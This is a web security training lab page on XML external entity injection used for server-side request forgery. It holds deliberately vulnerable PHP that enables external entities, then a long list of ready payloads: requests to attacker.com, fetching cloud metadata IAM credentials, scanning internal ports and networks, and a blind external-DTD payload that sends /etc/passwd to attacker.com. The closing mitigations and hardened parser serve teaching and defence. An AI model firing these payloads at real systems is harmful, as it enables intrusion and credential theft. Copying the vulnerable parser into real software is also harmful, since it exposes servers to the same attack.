Lab 3: XXE with SSRF

XXE leading to Server-Side Request Forgery

Difficulty: Medium

Lab Overview

This lab demonstrates XXE vulnerabilities that lead to Server-Side Request Forgery (SSRF) attacks. Attackers can use external entities to make requests to internal services, cloud metadata endpoints, and other network resources.

Objective: Use XXE to perform SSRF attacks and demonstrate network reconnaissance capabilities.

Vulnerable Code
// Vulnerable: Direct XML processing without validation
function process_xxe_ssrf($xml_input) {
    // Vulnerable: Enable external entities (DEFAULT BEHAVIOR)
    libxml_disable_entity_loader(false);

    try {
        // Vulnerable: Direct XML parsing without validation
        $dom = new DOMDocument();
        $dom->loadXML($xml_input, LIBXML_NOENT | LIBXML_DTDLOAD);

        // Process XML data: collect the text of every <data> element.
        // Because LIBXML_NOENT substitutes entities, the text already
        // contains whatever the external entity fetched, so the response
        // of the server-side request lands in the returned array.
        $data = [];
        foreach ($dom->getElementsByTagName('data') as $node) {
            $data[] = $node->textContent;
        }
        return $data;
    } catch (Exception $e) {
        return "Error parsing XML: " . $e->getMessage();
    }
}
⚠️ SSRF Warning

This lab demonstrates SSRF via XXE. The following targets can be reached through an external entity:

  • http://attacker.com - External requests
  • http://localhost:8080 - Internal services
  • http://169.254.169.254 - Cloud metadata
  • http://127.0.0.1:22 - Port scanning
Vulnerability Details
  • Type: XXE with SSRF
  • Severity: High
  • Method: POST
  • Issue: SSRF via XXE
SSRF Attack Types
  • External Requests: http://attacker.com
  • Internal Services: localhost, 127.0.0.1
  • Cloud Metadata: 169.254.169.254
  • Port Scanning: Various ports
XXE SSRF Payloads

Use these payloads to test Server-Side Request Forgery via XML External Entity Injection:

1. Basic SSRF Structure:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://attacker.com"> ]> <root><data>&xxe;</data></root>

2. External HTTP Requests:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://attacker.com"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://attacker.com/steal.php?data=secret"> ]> <root><data>&xxe;</data></root>

3. Internal Service Requests:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://localhost:8080"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://127.0.0.1:3306"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://localhost:22"> ]> <root><data>&xxe;</data></root>

4. Cloud Metadata Endpoints:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/user-data"> ]> <root><data>&xxe;</data></root>

5. Port Scanning Payloads:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://127.0.0.1:22"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://127.0.0.1:80"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://127.0.0.1:443"> ]> <root><data>&xxe;</data></root>

6. Database Port Scanning:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://127.0.0.1:3306"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://127.0.0.1:5432"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://127.0.0.1:6379"> ]> <root><data>&xxe;</data></root>

7. Internal Network Scanning:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://192.168.1.1"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://192.168.1.100"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://10.0.0.1"> ]> <root><data>&xxe;</data></root>

8. FTP SSRF Payloads:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "ftp://attacker.com/file.txt"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "ftp://anonymous:password@attacker.com/file.txt"> ]> <root><data>&xxe;</data></root>

9. Gopher SSRF Payloads:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "gopher://attacker.com:8080/1file.txt"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "gopher://127.0.0.1:25/1HELO%20attacker.com"> ]> <root><data>&xxe;</data></root>

10. LDAP SSRF Payloads:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "ldap://attacker.com:389/ou=users,dc=example,dc=com"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "ldap://127.0.0.1:389/ou=users,dc=example,dc=com"> ]> <root><data>&xxe;</data></root>

11. SMB SSRF Payloads:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "smb://attacker.com/share/file.txt"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "smb://127.0.0.1/share/file.txt"> ]> <root><data>&xxe;</data></root>

12. HTTPS SSRF Payloads:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "https://attacker.com"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "https://127.0.0.1:8443"> ]> <root><data>&xxe;</data></root>

13. Custom Port SSRF Payloads:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/admin"> ]> <root><data>&xxe;</data></root>
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://127.0.0.1:3000/api"> ]> <root><data>&xxe;</data></root>

14. External DTD for SSRF:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root SYSTEM "http://attacker.com/evil.dtd"> <root><data>&xxe;</data></root>
  evil.dtd content:
  <!ENTITY xxe SYSTEM "http://attacker.com/steal.php">

15. Blind XXE for SSRF:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> <root><data>&xxe;</data></root>
  evil.dtd content:
  <!ENTITY xxe SYSTEM "http://attacker.com/steal.php?data=%file;">
Real-World Attack Scenarios
Mitigation Strategies
  • Disable external entity processing in XML parsers
  • Use whitelist-based validation for allowed XML schemas
  • Implement proper input validation and sanitization
  • Use secure XML parsing libraries
  • Regular security testing and vulnerability assessments
  • Monitor for unusual XML processing patterns
  • Implement network segmentation and firewall rules
  • Use a Web Application Firewall (WAF) to detect XXE attempts
  • Implement proper access controls for internal services
  • Block access to cloud metadata endpoints
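The first two mitigations applied to the lab's own vulnerable function: an added example, not the lab's code, that replaces process_xxe_ssrf() with a parser that refuses DOCTYPE declarations, never substitutes entities, never loads a DTD and forbids network access while parsing. It also logs the entity target of a rejected document so the "monitor for unusual XML processing patterns" item has something to alert on. Assumes PHP 8.x with ext-dom and ext-libxml; entity_targets() and process_xml_safely() are names chosen here.

```php
<?php
// Added example, not the lab's own code. Assumes PHP 8.x with ext-dom/ext-libxml.

// Monitoring helper: every SYSTEM/PUBLIC entity URI declared in the input,
// so a rejected request can be logged together with the target it asked for.
function entity_targets(string $xml): array {
    preg_match_all('/<!ENTITY\s+(?:%\s*)?\w+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]*)"/i',
                   $xml, $m);
    return $m[1];
}

// Hardened replacement for process_xxe_ssrf().
function process_xml_safely(string $xml_input): array {
    // Cheap pre-check: API input has no business carrying a DOCTYPE.
    // Rejecting it here removes the internal subset, and with it every
    // SYSTEM entity, before libxml ever sees the document.
    if (preg_match('/<!DOCTYPE/i', $xml_input) === 1) {
        error_log('XML rejected: DOCTYPE present; entity targets: '
                  . implode(',', entity_targets($xml_input)));
        throw new InvalidArgumentException('DOCTYPE declarations are not accepted');
    }

    $prev = libxml_use_internal_errors(true);   // collect errors instead of printing
    try {
        $dom = new DOMDocument();
        // LIBXML_NONET forbids any network fetch during parsing. LIBXML_NOENT
        // and LIBXML_DTDLOAD are deliberately absent, so entity references stay
        // unexpanded and no external DTD is retrieved.
        if (!$dom->loadXML($xml_input, LIBXML_NONET)) {
            $err = libxml_get_last_error();
            throw new InvalidArgumentException(
                'Malformed XML: ' . ($err ? trim($err->message) : 'unknown error'));
        }
        // Second line of defence in case the regex pre-check was bypassed.
        if ($dom->doctype !== null) {
            throw new InvalidArgumentException('DOCTYPE declarations are not accepted');
        }
        $data = [];
        foreach ($dom->getElementsByTagName('data') as $node) {
            $data[] = $node->textContent;
        }
        return $data;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($prev);
    }
}

// Constructed inputs: a benign document, then the lab's "Basic SSRF Structure" payload.
var_dump(process_xml_safely('<root><data>hello</data></root>'));
try {
    process_xml_safely('<!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://attacker.com"> ]><root><data>&xxe;</data></root>');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

The benign document parses to a one-element array; the payload is rejected before parsing and its target URI is written to the error log.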